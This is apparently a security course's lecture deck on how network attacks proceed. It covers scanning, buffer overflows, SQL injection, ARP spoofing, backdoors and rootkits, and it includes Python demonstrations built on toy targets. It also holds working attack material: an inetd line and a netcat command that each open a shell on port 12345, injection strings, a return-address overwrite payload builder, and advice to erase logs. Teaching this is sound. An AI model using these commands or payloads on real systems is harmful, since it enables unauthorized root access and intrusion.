COEN 350 Security Threats

Upload: alvin-fowler

Post on 30-Dec-2015


COEN 350

Security Threats

Network Based Exploits

Phases of an Attack

Reconnaissance, scanning, gaining access, expanding access, covering tracks.

Reconnaissance

Social engineering, e.g. a call to the help desk: "I cannot access my email. What do I do?"

Dumpster diving (especially productive when people move offices and throw paperwork away).

Searching the Web: search engines, Usenet postings, whois lookups. Tools: Sam Spade (www.samspade.org/ssw/), CyberKit, NetScanTools, ...

Reconnaissance: Databases

To research .com, .net, and .org domain names: the InterNIC whois feature (www.internic.net/whois.html), allwhois, Network Solutions, ...

To research who owns a block of IP addresses: ARIN, the American Registry for Internet Numbers (www.arin.net/whois/arin-whois.html); RIPE (Europe) www.ripe.net; APNIC (Asia Pacific) www.apnic.net.

Scanning

Once we have a target, we need to get to know it better. Methods: war dialing (to find modem access), network mapping, port and vulnerability scanning, war driving (to find wireless access points).

Scanning: War Dialing

Purpose: find a modem connection. Many users in a company install remote-access software such as pcAnywhere on their desktop without setting it up correctly, so the modem answers any caller.

A war dialer finds these numbers by going through a range of phone numbers and listening for a modem carrier. A demon dialer then tries a brute-force password attack on a found connection.

Typically, war dialing a company's number range will find at least one unsecured connection.

Scanning: Network Mapping

Ping is implemented using the Internet Control Message Protocol (ICMP) Echo Request. A receiving station answers with an Echo Reply, which tells the sender that the host is up. Used by system administrators to check the status of machines and connections; used by attackers to find the live hosts in an address range (a "ping sweep").

Scanning: Network Mapping

Traceroute sends probes to a system with increasing time-to-live (TTL) values (= number of hops allowed). A router that decrements the TTL to zero discards the packet and sends an ICMP Time Exceeded error back to the sender, which reveals that router's address. Traceroute uses this, one TTL at a time, to find the route to a given system. (Windows tracert sends ICMP Echo Requests; Unix traceroute sends UDP packets to high ports by default.)

Useful for system administration; for an attacker it reveals the routers and firewalls in front of a target.

Scanning: Network Mapping

Cheops: network scanner (UNIX based) that uses traceroute, ping and other tools to draw a map of a network.

Cheops and its kind are the reason that firewalls intercept pings and other ICMP traffic.

Scanning: Port Scans

Applications on a system use ports to listen for network traffic or send it out. There are 2^16 = 65,536 TCP ports (and as many UDP ports), some reserved for well-known services such as http (80), ftp (21), ssh (22), ... A port scan sends various types of IP packets to the target on different ports; the reaction (SYN/ACK, RST, or silence) tells the scanner whether the port is open (an application listens), closed, or filtered by a firewall.

Scanning: Nmap

Uses different types of packets to check for open ports (TCP connect, SYN "half-open", FIN/Xmas/Null, UDP, ...). Can often tell from the responses which OS is running, and frequently its version, by fingerprinting quirks in the target's TCP/IP implementation. Can run in stealthier modes: a SYN scan never completes the handshake, so the listening application never sees a connection and does not log it, and slow scans in random port order stay under the thresholds of many firewalls and intrusion detection systems.
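As an added example (not from the slides), a connect() scan of the kind the two slides above describe, written in Python against a listener the script itself starts on loopback so it runs offline. The fake service, its greeting and the three-state classification (open / closed / filtered) are the example's own assumptions; Nmap's default SYN scan is the same idea done with raw packets so the handshake is never completed.

```python
import socket
import threading
from concurrent.futures import ThreadPoolExecutor


def probe(host: str, port: int, timeout: float = 0.5) -> str:
    """Classify one TCP port the way a connect() scan does.

    The full three-way handshake completes, so the target application (and
    its logs) see a connection. This is the noisy, unprivileged scan; Nmap's
    SYN scan needs raw sockets to stop after SYN / SYN-ACK.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            return "open"            # SYN-ACK came back: something listens
        except ConnectionRefusedError:
            return "closed"          # RST came back: host up, nothing listens
        except (socket.timeout, OSError):
            return "filtered"        # silence: dropped by a firewall (or host down)


def connect_scan(host: str, ports, workers: int = 32) -> dict:
    """Scan a list of ports in parallel and return {port: state}."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        return dict(pool.map(lambda p: (p, probe(host, p)), ports))


def grab_banner(host: str, port: int, timeout: float = 1.0) -> bytes:
    """Read whatever the service volunteers first. ssh, smtp and ftp announce
    themselves, which is how scanners guess the software and its version."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        try:
            return s.recv(256)
        except (socket.timeout, OSError):
            return b""


def start_fake_service(greeting: bytes = b"SSH-2.0-OpenSSH_demo\r\n"):
    """Constructed target so the scan runs offline: an in-process listener on an
    ephemeral loopback port that sends a greeting and hangs up. Returns (socket, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(8)
    port = srv.getsockname()[1]

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:          # listener closed: stop the thread
                return
            with conn:
                try:
                    conn.sendall(greeting)
                except OSError:
                    pass

    threading.Thread(target=serve, daemon=True).start()
    return srv, port


def unused_port() -> int:
    """Bind and release an ephemeral port so we have a known-closed port to show."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


if __name__ == "__main__":
    srv, open_port = start_fake_service()
    closed_port = unused_port()
    for port, state in sorted(connect_scan("127.0.0.1", [open_port, closed_port]).items()):
        line = f"{port:5d}/tcp {state}"
        if state == "open":
            line += "  " + grab_banner("127.0.0.1", port).decode(errors="replace").strip()
        print(line)
    srv.close()
```

Run it as a script and it prints one line per port with the banner next to the open one; point `connect_scan` at a real host and the "filtered" state is what a firewall that silently drops SYNs produces, which is why the timeout matters.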

Gaining Access

Gain access using application and OS attacks. Gain access using network attacks.

Gaining Access through Apps and OS

Stack-based overflow attacks. The stack is the area of memory where function arguments, saved registers, return addresses and local variables (including fixed-size buffers) are stored.

Password attacks. Web application attacks.

Stack Based Attacks

When a function is called, the caller pushes the arguments on the stack, then the call instruction pushes the return address. The called function saves the caller's frame pointer (and any other registers it will use) on top of that and reserves space for its local variables, including any fixed-size buffers. At the end of the function the registers are restored from the stack and the return address is popped into the instruction pointer.

Stack Based Attack

If a function copies a string input into a fixed-size local buffer and is poorly written (no length check, e.g. strcpy or gets), a long input runs past the end of the buffer and overwrites what lies above it: the saved frame pointer and the return address. When the function returns, the attacker's bytes are loaded into the instruction pointer, so the attacker chooses where execution continues, typically inside the input itself, which carries a short snippet of machine code (shellcode).

Stack Based Attacks (How to do it?)

Take a popular application, install it on your machine, and see whether you can crash it by giving it long inputs.

If it does, run it under a debugger to find out which bytes of your input end up in which registers, above all the instruction pointer. Any debugger installed on your system will tell you.

Fine-tune the input so that the return address points at something interesting (your own code).

Ready to go and wreak havoc.
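The procedure on the last three slides, as an added example in Python that is not part of the lecture. A toy x86-64 frame (assumed layout: 16-byte buffer, then 8-byte saved frame pointer, then 8-byte return address, little-endian) stands in for the real stack; an unbounded strcpy-style copy overflows it; a de Bruijn "cyclic" pattern does the debugger step, because the bytes that land in the return address identify their own offset in the input; and a bounded copy shows the fix. Addresses, sizes and the NOP padding are made up for the example.

```python
import itertools
import struct

# Assumed frame layout of a function with a 16-byte local buffer (x86-64, little-endian):
#   [ buf 16 bytes ][ saved rbp 8 bytes ][ return address 8 bytes ]
BUF_SIZE, SAVED_FP_SIZE, RET_SIZE = 16, 8, 8
RET_OFFSET = BUF_SIZE + SAVED_FP_SIZE      # 24 bytes of input reach the return address


def _de_bruijn(alphabet: bytes, n: int):
    """Lazily yield a de Bruijn sequence: every n-byte window occurs exactly once."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for i in range(1, p + 1):
                    yield alphabet[a[i]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length: int, alphabet: bytes = b"abcdefghijklmnopqrstuvwxyz", n: int = 4) -> bytes:
    """Crash pattern: any slice of 4 or more bytes identifies its own position."""
    return bytes(itertools.islice(_de_bruijn(alphabet, n), length))


def find_offset(fragment: bytes, max_len: int = 1 << 16) -> int:
    """Given the bytes the debugger showed in the crashed register, return how far
    into the input they sat (-1 if the fragment did not come from the pattern)."""
    return cyclic(max_len).find(fragment)


class Frame:
    """Toy stack frame. strcpy has no bounds check; strlcpy does."""

    def __init__(self, saved_fp=0x7FFD_0000_1000, ret=0x0000_0000_0040_1150):
        self.mem = bytearray(BUF_SIZE + SAVED_FP_SIZE + RET_SIZE)
        struct.pack_into("<QQ", self.mem, BUF_SIZE, saved_fp, ret)

    def return_address(self) -> int:
        return struct.unpack_from("<Q", self.mem, RET_OFFSET)[0]

    def strcpy(self, data: bytes) -> None:
        """Unbounded copy: writes the whole string plus NUL starting at buf, running
        over the saved frame pointer and return address if the input is long. Bytes
        past the frame are dropped here; on a real stack they hit the caller's frame."""
        data += b"\0"
        end = min(len(data), len(self.mem))
        self.mem[:end] = data[:end]

    def strlcpy(self, data: bytes) -> bool:
        """Bounded copy: refuses input that does not fit in buf together with its NUL."""
        if len(data) >= BUF_SIZE:
            return False
        self.mem[:len(data) + 1] = data + b"\0"
        return True


def locate_return_offset() -> int:
    """Debugger step: crash with the pattern, read the register, look its bytes up."""
    f = Frame()
    f.strcpy(cyclic(64))
    crashed_ip = f.return_address()          # what the debugger shows in rip
    return find_offset(struct.pack("<Q", crashed_ip))


def build_payload(offset: int, target: int, pad: bytes = b"\x90") -> bytes:
    """Fine-tuning step: pad up to the return address, then overwrite it with target."""
    return pad * offset + struct.pack("<Q", target)


def hijack(target: int = 0x7FFD_0000_0F00) -> int:
    f = Frame()
    f.strcpy(build_payload(locate_return_offset(), target))
    return f.return_address()                # now attacker-chosen


def hardened(target: int = 0x7FFD_0000_0F00) -> int:
    f = Frame()
    f.strlcpy(build_payload(locate_return_offset(), target))   # rejected: too long
    return f.return_address()                # unchanged


if __name__ == "__main__":
    print(f"return address is {locate_return_offset()} bytes into the input")
    print(f"hijacked rip: {hijack():#x}   with bounded copy: {hardened():#x}")
```

On a real target the same `find_offset` is applied to the register value gdb prints at the crash; the model only replaces the process with a bytearray so the arithmetic can be checked without a vulnerable binary.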

Buffer Attack Example

On a Unix system, use a buffer overflow in a network-accessible program (running as root) to execute:

/bin/sh -c "echo '12345 stream tcp nowait root /bin/sh sh -i' >> /etc/inetd.conf; killall -HUP inetd"

This appends a service to inetd's configuration and makes inetd reread it: from now on, anyone connecting to TCP port 12345 gets an interactive command shell running as root.

Web Application Attacks

The URL not only contains the web address of a site, but also input (everything after the "?"):

http://www.google.com/search?hl=en&ie=UTF-8&oe=UTF-8&q=web+application+attack

A poorly written web page passes such input along without checking it. If the page builds SQL statements from the input, the viewer can inject SQL of his own and read or change the database (SQL injection).
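An added example, not from the slides, of the SQL case in Python with an in-memory SQLite table holding constructed data: the name is parsed out of the URL's query string, once pasted into the SQL text and once passed as a bound parameter. The tautology and UNION inputs are the classic injection strings; the hostname and paths are made up.

```python
import sqlite3
from urllib.parse import urlsplit, parse_qs, quote


def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the site's user table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (name TEXT, email TEXT, is_admin INTEGER)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("alice", "alice@example.com", 1),
        ("bob", "bob@example.com", 0),
    ])
    return con


def query_param(url: str, name: str) -> str:
    """Everything after '?' is attacker-controlled, like q= in the Google URL on the
    slide. parse_qs also undoes the %27 / + encoding, so quotes arrive intact."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def lookup_vulnerable(con, name: str):
    """The poorly written page: the input becomes part of the SQL text."""
    sql = "SELECT name, email FROM users WHERE name = '" + name + "'"
    return con.execute(sql).fetchall()


def lookup_safe(con, name: str):
    """Parameterised query: the value travels separately from the statement, so it
    can never turn into SQL syntax, whatever quotes it contains."""
    return con.execute("SELECT name, email FROM users WHERE name = ?", (name,)).fetchall()


# Constructed requests. The second and third encode what an attacker types into the
# name field: a tautology that matches every row, and a UNION that pulls a column
# (is_admin) the page never meant to show.
NORMAL_URL = "http://www.example.com/profile?name=alice"
TAUTOLOGY_URL = "http://www.example.com/profile?name=" + quote("x' OR '1'='1")
UNION_URL = "http://www.example.com/profile?name=" + quote(
    "x' UNION SELECT name, is_admin FROM users --")


def run(url: str, safe: bool):
    """Serve one request against a fresh database with either lookup."""
    con = make_db()
    name = query_param(url, "name")
    return (lookup_safe if safe else lookup_vulnerable)(con, name)


if __name__ == "__main__":
    for label, url in [("normal", NORMAL_URL), ("tautology", TAUTOLOGY_URL), ("union", UNION_URL)]:
        print(f"{label:10s} vulnerable={run(url, safe=False)}  safe={run(url, safe=True)}")
```

With the vulnerable lookup the tautology returns every user and the UNION leaks the admin flag; the parameterised lookup returns nothing for both, because it is looking for a user literally named `x' OR '1'='1`.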

Gaining Access through Network Attacks: Sniffing

A sniffer gathers traffic from a LAN. Examples: Snort (www.snort.org), Sniffit (reptile.rug.ac.be/~coder/sniffit/sniffit.html).

On a switched LAN the sniffer only sees traffic addressed to its own machine. To get at other hosts' packets, the attacker sends spoofed ARP (Address Resolution Protocol) replies that reroute their traffic through his machine.
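An added example in Python, not from the lecture: it builds the ARP reply an attacker would send to poison a victim's cache (MACs and addresses are constructed), parses it back, and runs the arpwatch-style check a defender uses, flagging an IP whose hardware address changes. Sending the frame would need a raw AF_PACKET socket and root; the example stops at building it.

```python
import struct
import ipaddress

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_arp(op, sender_mac, sender_ip, target_mac, target_ip, eth_dst=None) -> bytes:
    """Ethernet II header + 28-byte ARP body, network byte order (42 bytes)."""
    eth = struct.pack("!6s6sH", mac_bytes(eth_dst or target_mac), mac_bytes(sender_mac), ETH_P_ARP)
    body = struct.pack("!HHBBH6s4s6s4s",
                       1, 0x0800, 6, 4, op,        # Ethernet, IPv4, MAC len, IP len, opcode
                       mac_bytes(sender_mac), ipaddress.IPv4Address(sender_ip).packed,
                       mac_bytes(target_mac), ipaddress.IPv4Address(target_ip).packed)
    return eth + body


def parse_arp(frame: bytes):
    """Return the ARP fields as a dict, or None for anything that is not ARP."""
    if len(frame) < 42:
        return None
    _dst, _src, ethertype = struct.unpack_from("!6s6sH", frame, 0)
    if ethertype != ETH_P_ARP:
        return None
    _, _, _, _, op, sha, spa, tha, tpa = struct.unpack_from("!HHBBH6s4s6s4s", frame, 14)
    return {"op": op,
            "sender_mac": mac_str(sha), "sender_ip": str(ipaddress.IPv4Address(spa)),
            "target_mac": mac_str(tha), "target_ip": str(ipaddress.IPv4Address(tpa))}


class ArpWatch:
    """Detector: learn IP -> MAC from every ARP packet seen and flag an IP that
    changes hardware address (arpwatch calls this a 'flip flop')."""

    def __init__(self):
        self.table = {}
        self.alerts = []

    def observe(self, frame: bytes) -> None:
        pkt = parse_arp(frame)
        if pkt is None:
            return
        ip, mac = pkt["sender_ip"], pkt["sender_mac"]
        known = self.table.get(ip)
        if known is not None and known != mac:
            self.alerts.append({"ip": ip, "was": known, "now": mac})
        self.table[ip] = mac


def demo_capture() -> list:
    """Constructed LAN with a gateway, a victim and an attacker; frames in order."""
    gw_ip, gw_mac = "192.168.1.1", "00:11:22:33:44:01"
    victim_ip, victim_mac = "192.168.1.10", "00:11:22:33:44:10"
    attacker_mac = "de:ad:be:ef:00:01"
    return [
        # victim asks who has the gateway; the gateway answers honestly
        build_arp(ARP_REQUEST, victim_mac, victim_ip, "00:00:00:00:00:00", gw_ip, eth_dst=BROADCAST),
        build_arp(ARP_REPLY, gw_mac, gw_ip, victim_mac, victim_ip),
        # the poison: an unsolicited reply claiming the gateway's IP is at attacker_mac.
        # Once the victim's cache takes it, everything the victim sends to the gateway
        # arrives at the attacker's sniffer, which forwards it on to stay unnoticed.
        build_arp(ARP_REPLY, attacker_mac, gw_ip, victim_mac, victim_ip),
    ]


def run_detector(frames=None) -> ArpWatch:
    watch = ArpWatch()
    for frame in (frames if frames is not None else demo_capture()):
        watch.observe(frame)
    return watch


if __name__ == "__main__":
    for alert in run_detector().alerts:
        print(f"ALERT {alert['ip']} moved from {alert['was']} to {alert['now']}")
```

The same observer fed from a real capture (a raw socket or pcap file) is the whole of an ARP-spoofing detector; what it cannot tell is which of the two MACs is the legitimate one, so the alert needs a human or an inventory behind it.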

Session Hijacking

IP address spoofing: sending out IP packets with a false source address. If an attacker sits on a link through which traffic between two sites flows, he can watch the sequence numbers and inject spoofed packets to "hijack the session", taking over a connection that has already been authenticated. Details omitted.

Exploiting and Maintaining Access

After a successful intrusion, an attacker should: use other tools to gain root or administrator privileges; erase traces (e.g. change log entries); take measures to maintain access; close the security hole that was used, so that no one else can gain illicit access and do something stupid that wakes up the sysadmin.

Trojans

A program with an additional, evil payload. E.g. running MS Word also reinstalls a backdoor.

Backdoors

Bypass normal security measures.

Example: netcat. Install on the victim a netcat built with the GAPING_SECURITY_HOLE option (the compile-time switch that enables -e):

C:\> nc -l -p 12345 -e cmd.exe

In the future: connect to port 12345 and start typing commands. (With plain -l the listener exits when the first session ends; the Windows build's -L re-listens after each one.)

Backdoors

BO2K (Back Orifice 2000) runs in stealth mode (you cannot discover it by looking at the Processes tab in the Task Manager). Otherwise, it is a remote control program like pcAnywhere that allows accessing a computer over the net.

Backdoors

Rootkit: a backdoor built as Trojan versions of system executables such as ifconfig, ps, netstat and ls, so that the attacker's sniffer, processes, connections and files stay hidden from the tools an administrator would use to look for them. Kernel-level rootkit: changes the OS itself, not only system executables, so even a freshly installed, clean copy of ps is lied to.

Responses

Filter Internet connections. Run security audits (e.g. try to use hacking tools to break into your own system). Back up all data and prepare for a complete reinstall after an incident. Log to write-once media or to a separate log host, so that an intruder who gains root cannot change the entries. For commercial sites: develop a comprehensive security policy.